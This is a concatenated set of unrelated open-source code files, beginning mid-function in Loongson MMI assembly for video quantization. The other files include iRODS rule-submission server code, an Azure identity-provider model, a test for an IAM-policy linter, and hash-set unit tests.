$f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x70(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14" ); } void WelsQuantFour4x4Max_mmi(int16_t *pDct, const int16_t*ff, const int16_t *mf, int16_t *max) { BACKUP_REG; __asm__ volatile ( ".set arch=loongson3a \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "xor $f16, $f16, $f16 \n\t" "xor $f18, $f18, $f18 \n\t" "xor $f20, $f20, $f20 \n\t" "xor $f22, $f22, $f22 \n\t" "xor $f24, $f24, $f24 \n\t" "xor $f26, $f26, $f26 \n\t" "xor $f28, $f28, $f28 \n\t" "xor $f30, $f30, $f30 \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f16, $f16, $f0 \n\t" "pmaxsh $f18, $f18, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f16, $f16, $f0 \n\t" "pmaxsh $f18, $f18, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f20, $f20, $f0 \n\t" "pmaxsh $f22, $f22, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f20, $f20, $f0 \n\t" "pmaxsh $f22, $f22, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f24, $f24, $f0 \n\t" "pmaxsh $f26, $f26, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f24, $f24, $f0 \n\t" "pmaxsh $f26, $f26, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f28, $f28, $f0 \n\t" "pmaxsh $f30, $f30, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f28, $f28, $f0 \n\t" "pmaxsh $f30, $f30, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "mov.d $f0, $f18 \n\t" "punpckhhw $f18, $f16, $f20 \n\t" "punpcklhw $f16, $f16, $f20 \n\t" "punpckhhw $f2, $f0, $f22 \n\t" "punpcklhw $f0, $f0, $f22 \n\t" "mov.d $f20, $f26 \n\t" "punpckhhw $f26, $f24, $f28 \n\t" "punpcklhw $f24, $f24, $f28 \n\t" "punpckhhw $f22, $f20, $f30 \n\t" "punpcklhw $f20, $f20, $f30 \n\t" "mov.d $f28, $f18 \n\t" "punpckhwd $f18, $f16, $f24 \n\t" "punpcklwd $f16, $f16, $f24 \n\t" "punpckhwd $f30, $f28, $f26 \n\t" "punpcklwd $f28, $f28, $f26 \n\t" "mov.d $f24, $f2 \n\t" "punpckhwd $f2, $f0, $f20 \n\t" "punpcklwd $f0, $f0, $f20 \n\t" "punpckhwd $f26, $f24, $f22 \n\t" "punpcklwd $f24, $f24, $f22 \n\t" "mov.d $f20, $f18 \n\t" "mov.d $f18, $f0 \n\t" "mov.d $f22, $f2 \n\t" "mov.d $f0, $f30 \n\t" "mov.d $f30, $f24 \n\t" "mov.d $f2, $f26 \n\t" "pmaxsh $f0, $f0, $f16 \n\t" "pmaxsh $f2, $f2, $f18 \n\t" "pmaxsh $f0, $f0, $f20 \n\t" "pmaxsh $f2, $f2, $f22 \n\t" "pmaxsh $f0, $f0, $f28 \n\t" "pmaxsh $f2, $f2, $f30 \n\t" "mov.d $f4, $f0 \n\t" "mov.d $f6, $f2 \n\t" "mov.d $f0, $f2 \n\t" "mov.d $f2, $f6 \n\t" "pmaxsh $f0, $f0, $f4 \n\t" "pmaxsh $f2, $f2, $f6 \n\t" "gssdlc1 $f0, 0x7(%[max]) \n\t" "gssdrc1 $f0, 0x0(%[max]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf), [max]"r"((short *)max) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14", "$f16", "$f18", "$f20", "$f22", "$f24", "$f26", "$f28", "$f30" ); RECOVER_REG; }
21,555
893
<reponame>josephobonyo/sigma_coding_youtube import win32com.client # create a new instance of PowerPoint PPTApp = win32com.client.Dispatch("PowerPoint.Application") PPTApp.Visible = True # create a new presentation in the application PPTPresentation = PPTApp.Presentations.Add() # add a new slide to the presentation PPTPresentation.Slides.Add(Index = 1, Layout = 12)
118
10,225
package io.quarkus.qute; import java.util.concurrent.CompletionStage; /** * * @see ReflectionValueResolver */ @FunctionalInterface interface ValueAccessor { /** * * @param instance * @return the value */ CompletionStage<Object> getValue(Object instance); }
107
852
// -*- C++ -*- // // Package: TrackAssociator // Class: FiducialVolume // /* Description: detector active volume */ // // Original Author: <NAME> // // #include "TrackingTools/TrackAssociator/interface/FiducialVolume.h" #include "FWCore/MessageLogger/interface/MessageLogger.h" #include "FWCore/Utilities/interface/Exception.h" bool FiducialVolume::isValid() const { return minR_ < 1e4 && maxR_ >= minR_ && minZ_ < 1e4 && maxZ_ >= minZ_; } void FiducialVolume::addActivePoint(const GlobalPoint& point) { if (point.perp() > maxR_) maxR_ = point.perp(); if (fabs(point.eta()) < 1 && point.perp() < minR_) minR_ = point.perp(); if (fabs(point.z()) > maxZ_) maxZ_ = fabs(point.z()); if (fabs(point.eta()) > 1.7 && fabs(point.z()) < minZ_) minZ_ = fabs(point.z()); } void FiducialVolume::reset() { minR_ = 1e5; maxR_ = -1; minZ_ = 1e5; maxZ_ = -1; } void FiducialVolume::determinInnerDimensions() { if (maxR_ > 0 && maxR_ < minR_) minR_ = maxR_; if (maxZ_ > 0 && maxZ_ < minZ_) minZ_ = maxZ_; }
462
1,442
#ifndef ESCHER_MESSAGE_TABLE_CELL_WITH_EXPRESSION_H #define ESCHER_MESSAGE_TABLE_CELL_WITH_EXPRESSION_H #include <escher/message_table_cell.h> #include <escher/expression_view.h> namespace Escher { class MessageTableCellWithExpression : public MessageTableCell { public: MessageTableCellWithExpression(I18n::Message message = (I18n::Message)0); const View * subLabelView() const override { return &m_subtitleView; } void setHighlighted(bool highlight) override; void setLayout(Poincare::Layout layout); private: ExpressionView m_subtitleView; }; } #endif
200
333
#include "rsRuleExecSubmit.hpp" #include "rodsErrorTable.h" #include "rodsConnect.h" #include "icatHighLevelRoutines.hpp" #include "rcMisc.h" #include "miscServerFunct.hpp" #include "irods_log.hpp" #include "irods_get_full_path_for_config_file.hpp" #include "irods_random.hpp" #include "irods_configuration_keywords.hpp" #include "key_value_proxy.hpp" #include "catalog_utilities.hpp" #include "ruleExecSubmit.h" #include "server_utilities.hpp" #include "json_serialization.hpp" #include <nlohmann/json.hpp> #include <cstring> #include <string> namespace { using json = nlohmann::json; auto is_input_valid(const ruleExecSubmitInp_t* _input) noexcept -> bool { return _input && _input->packedReiAndArgBBuf && _input->packedReiAndArgBBuf->buf && _input->packedReiAndArgBBuf->len > 0; } auto _rsRuleExecSubmit(RsComm* rsComm, ruleExecSubmitInp_t* ruleExecSubmitInp) -> int { // Do not allow clients to schedule delay rules with session variables in them. // This function will reject rules that have session variables in comments as well. if (irods::contains_session_variables(ruleExecSubmitInp->ruleName)) { rodsLog(LOG_ERROR, "Rules cannot contain session variables. Use dynamic PEPs instead."); return RE_UNSUPPORTED_SESSION_VAR; } ruleExecInfoAndArg_t* rei_info{}; if (const auto ec = unpackReiAndArg(rsComm, &rei_info, ruleExecSubmitInp->packedReiAndArgBBuf); ec < 0) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit: Could not unpack REI buffer [error_code=%i].", ec); return ec; } // EMPTY_REI_PATH is a note to the DBA that this column is not used and // is reserved for future use. rstrcpy(ruleExecSubmitInp->reiFilePath, "EMPTY_REI_PATH", sizeof(ruleExecSubmitInp_t::reiFilePath)); irods::experimental::key_value_proxy kvp{ruleExecSubmitInp->condInput}; kvp[RULE_EXECUTION_CONTEXT_KW] = irods::to_json(rei_info->rei).dump().data(); // Verify that the priority is valid if the client provided one. if (std::strlen(ruleExecSubmitInp->priority) > 0) { try { if (const auto p = std::stoi(ruleExecSubmitInp->priority); p < 1 || p > 9) { rodsLog(LOG_ERROR, "Delay rule priority must satisfy the following requirement: 1 <= P <= 9."); return SYS_INVALID_INPUT_PARAM; } } catch (...) { rodsLog(LOG_ERROR, "Delay rule priority is not an integer."); return SYS_INVALID_INPUT_PARAM; } } else { // The client did not provide a priority, use the default value. rstrcpy(ruleExecSubmitInp->priority, "5", sizeof(ruleExecSubmitInp_t::priority)); } // Register the request. std::string svc_role; if (const auto err = get_catalog_service_role(svc_role); !err.ok()) { irods::log(PASS(err)); return err.code(); } if (irods::CFG_SERVICE_ROLE_PROVIDER == svc_role) { const auto status = chlRegRuleExec(rsComm, ruleExecSubmitInp); if (status < 0) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit: chlRegRuleExec error. status = %d", status); } return status; } if (irods::CFG_SERVICE_ROLE_CONSUMER == svc_role) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit error. ICAT is not configured on this host"); return SYS_NO_ICAT_SERVER_ERR; } rodsLog(LOG_ERROR, "role not supported [%s]", svc_role.c_str()); return SYS_SERVICE_ROLE_NOT_SUPPORTED; } } // anonymous namespace int rsRuleExecSubmit(RsComm* rsComm, ruleExecSubmitInp_t* ruleExecSubmitInp, char** ruleExecId) { *ruleExecId = nullptr; if (!is_input_valid(ruleExecSubmitInp)) { rodsLog(LOG_ERROR, "rsRuleExecSubmit: Invalid input (null pointer or empty buffer)"); return SYS_INTERNAL_NULL_INPUT_ERR; } namespace ic = irods::experimental::catalog; if (!ic::connected_to_catalog_provider(*rsComm)) { auto kvp = irods::experimental::make_key_value_proxy(ruleExecSubmitInp->condInput); if (kvp.contains(EXEC_LOCALLY_KW)) { rodsLog(LOG_ERROR, "rsRuleExecSubmit: ReHost config error. ReServer not running locally."); return SYS_CONFIG_FILE_ERR; } kvp[EXEC_LOCALLY_KW] = ""; auto* host_info = ic::redirect_to_catalog_provider(*rsComm); return rcRuleExecSubmit(host_info->conn, ruleExecSubmitInp, ruleExecId); } if (const auto ec = _rsRuleExecSubmit(rsComm, ruleExecSubmitInp); ec < 0) { return ec; } *ruleExecId = strdup(ruleExecSubmitInp->ruleExecId); return 0; }
2,218
1,350
<filename>sdk/resourcemanager/azure-resourcemanager-containerservice/src/main/java/com/azure/resourcemanager/containerservice/models/OpenShiftManagedClusterAadIdentityProvider.java // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.containerservice.models; import com.azure.core.annotation.Fluent; import com.azure.core.util.logging.ClientLogger; import com.fasterxml.jackson.annotation.JsonIgnore; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonTypeInfo; import com.fasterxml.jackson.annotation.JsonTypeName; /** Defines the Identity provider for MS AAD. */ @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, include = JsonTypeInfo.As.PROPERTY, property = "kind") @JsonTypeName("AADIdentityProvider") @Fluent public final class OpenShiftManagedClusterAadIdentityProvider extends OpenShiftManagedClusterBaseIdentityProvider { @JsonIgnore private final ClientLogger logger = new ClientLogger(OpenShiftManagedClusterAadIdentityProvider.class); /* * The clientId password associated with the provider. */ @JsonProperty(value = "clientId") private String clientId; /* * The secret password associated with the provider. */ @JsonProperty(value = "secret") private String secret; /* * The tenantId associated with the provider. */ @JsonProperty(value = "tenantId") private String tenantId; /* * The groupId to be granted cluster admin role. */ @JsonProperty(value = "customerAdminGroupId") private String customerAdminGroupId; /** * Get the clientId property: The clientId password associated with the provider. * * @return the clientId value. */ public String clientId() { return this.clientId; } /** * Set the clientId property: The clientId password associated with the provider. * * @param clientId the clientId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withClientId(String clientId) { this.clientId = clientId; return this; } /** * Get the secret property: The secret password associated with the provider. * * @return the secret value. */ public String secret() { return this.secret; } /** * Set the secret property: The secret password associated with the provider. * * @param secret the secret value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withSecret(String secret) { this.secret = secret; return this; } /** * Get the tenantId property: The tenantId associated with the provider. * * @return the tenantId value. */ public String tenantId() { return this.tenantId; } /** * Set the tenantId property: The tenantId associated with the provider. * * @param tenantId the tenantId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withTenantId(String tenantId) { this.tenantId = tenantId; return this; } /** * Get the customerAdminGroupId property: The groupId to be granted cluster admin role. * * @return the customerAdminGroupId value. */ public String customerAdminGroupId() { return this.customerAdminGroupId; } /** * Set the customerAdminGroupId property: The groupId to be granted cluster admin role. * * @param customerAdminGroupId the customerAdminGroupId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withCustomerAdminGroupId(String customerAdminGroupId) { this.customerAdminGroupId = customerAdminGroupId; return this; } /** * Validates the instance. * * @throws IllegalArgumentException thrown if the instance is not valid. */ @Override public void validate() { super.validate(); } }
1,507
811
<filename>tests/unit/test_authorization_file.py import unittest import jsoncfg import json from parliament import analyze_policy_string class TestAuthDetailsFile(unittest.TestCase): def test_auth_details_example(self): auth_details_json = { "UserDetailList": [ { "Path": "/", "UserName": "obama", "UserId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:user/obama", "CreateDate": "2019-12-18 19:10:08+00:00", "GroupList": ["admin"], "AttachedManagedPolicies": [], "Tags": [], } ], "GroupDetailList": [ { "Path": "/", "GroupName": "admin", "GroupId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:group/admin", "CreateDate": "2017-05-15 17:33:36+00:00", "GroupPolicyList": [], "AttachedManagedPolicies": [ { "PolicyName": "AdministratorAccess", "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess", } ], } ], "RoleDetailList": [ { "Path": "/", "RoleName": "MyRole", "RoleId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:role/MyRole", "CreateDate": "2019-08-16 17:27:59+00:00", "AssumeRolePolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {"Service": "ssm.amazonaws.com"}, "Action": "sts:AssumeRole", } ], }, "InstanceProfileList": [], "RolePolicyList": [ { "PolicyName": "Stuff", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Action": [ "s3:ListBucket", "s3:Put*", "s3:Get*", "s3:*MultipartUpload*", ], "Resource": ["*"], "Effect": "Allow", } ], }, } ], "AttachedManagedPolicies": [], "Tags": [], "RoleLastUsed": {}, }, { "Path": "/", "RoleName": "MyOtherRole", "RoleId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:role/MyOtherRole", "CreateDate": "2019-08-16 17:27:59+00:00", "AssumeRolePolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {"Service": "ssm.amazonaws.com"}, "Action": "sts:AssumeRole", } ], }, "InstanceProfileList": [], "RolePolicyList": [ { "PolicyName": "SupYo", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutBucketPolicy", "s3:PutBucketAcl", "s3:PutLifecycleConfiguration", "s3:PutObject", "s3:GetObject", "s3:DeleteObject", ], "Resource": "*", } ], }, } ], "AttachedManagedPolicies": [], "Tags": [], "RoleLastUsed": {}, }, ], "Policies": [ { "PolicyName": "NotYourPolicy", "PolicyId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:policy/NotYourPolicy", "Path": "/", "DefaultVersionId": "v9", "AttachmentCount": 1, "PermissionsBoundaryUsageCount": 0, "IsAttachable": True, "CreateDate": "2020-01-29 21:24:20+00:00", "UpdateDate": "2020-01-29 23:23:12+00:00", "PolicyVersionList": [ { "Document": { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutBucketPolicy", "s3:PutBucketAcl", "s3:PutLifecycleConfiguration", "s3:PutObject", "s3:GetObject", "s3:DeleteObject", ], "Resource": [ "arn:aws:s3:::mybucket/*", "arn:aws:s3:::mybucket", ], } ], }, "VersionId": "v9", "IsDefaultVersion": True, "CreateDate": "2020-01-29 23:23:12+00:00", } ], } ], } findings = [] for policy in auth_details_json["Policies"]: # Ignore AWS defined policies if "arn:aws:iam::aws:" not in policy["Arn"]: continue if ( policy["Path"] == "/service-role/" or policy["Path"] == "/aws-service-role/" or policy["PolicyName"].startswith("AWSServiceRoleFor") or policy["PolicyName"].endswith("ServiceRolePolicy") or policy["PolicyName"].endswith("ServiceLinkedRolePolicy") ): continue for version in policy["PolicyVersionList"]: if not version["IsDefaultVersion"]: continue print(version["Document"]) policy = analyze_policy_string( json.dumps(version["Document"]), policy["Arn"], ) findings.extend(policy.findings) # Review the inline policies on Users, Roles, and Groups for user in auth_details_json["UserDetailList"]: for policy in user.get("UserPolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), user["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) for role in auth_details_json["RoleDetailList"]: for policy in role.get("RolePolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), role["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) for group in auth_details_json["GroupDetailList"]: for policy in group.get("GroupPolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), group["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) self.maxDiff = None self.assertTrue("RESOURCE_POLICY_PRIVILEGE_ESCALATION" in str(findings))
6,549
1,142
<gh_stars>1000+ #include <robin_hood.h> #include <app/doctest.h> #include <iostream> TYPE_TO_STRING(robin_hood::unordered_flat_set<uint64_t>); TYPE_TO_STRING(robin_hood::unordered_node_set<uint64_t>); TEST_CASE_TEMPLATE("unordered_set_asserts", Set, robin_hood::unordered_flat_set<uint64_t>, robin_hood::unordered_node_set<uint64_t>) { static_assert(std::is_same<typename Set::key_type, uint64_t>::value, "key_type same"); static_assert(std::is_same<typename Set::value_type, uint64_t>::value, "value_type same"); } TEST_CASE_TEMPLATE("unordered_set", Set, robin_hood::unordered_flat_set<uint64_t>, robin_hood::unordered_node_set<uint64_t>) { Set set; set.emplace(UINT64_C(123)); REQUIRE(set.size() == 1U); set.insert(UINT64_C(333)); REQUIRE(set.size() == 2U); set.erase(UINT64_C(222)); REQUIRE(set.size() == 2U); set.erase(UINT64_C(123)); REQUIRE(set.size() == 1U); } TEST_CASE_TEMPLATE("unordered_set_string", Set, robin_hood::unordered_flat_set<std::string>, robin_hood::unordered_node_set<std::string>) { Set set; REQUIRE(set.begin() == set.end()); set.emplace(static_cast<size_t>(2000), 'a'); REQUIRE(set.size() == 1); REQUIRE(set.begin() != set.end()); std::string& str = *set.begin(); REQUIRE(str == std::string(static_cast<size_t>(2000), 'a')); auto it = set.begin(); REQUIRE(++it == set.end()); } TEST_CASE_TEMPLATE("unordered_set_eq", Set, robin_hood::unordered_flat_set<std::string>, robin_hood::unordered_node_set<std::string>) { Set set1; Set set2; REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.emplace("asdf"); // (asdf) == () REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.emplace("huh"); // (asdf) == (huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set1.emplace("huh"); // (asdf, huh) == (huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.emplace("asdf"); // (asdf, huh) == (asdf, huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.erase("asdf"); // (huh) == (asdf, huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.erase("asdf"); // (huh) == (huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.clear(); // () == (huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.erase("huh"); // () == () REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); }
1,371
1,699
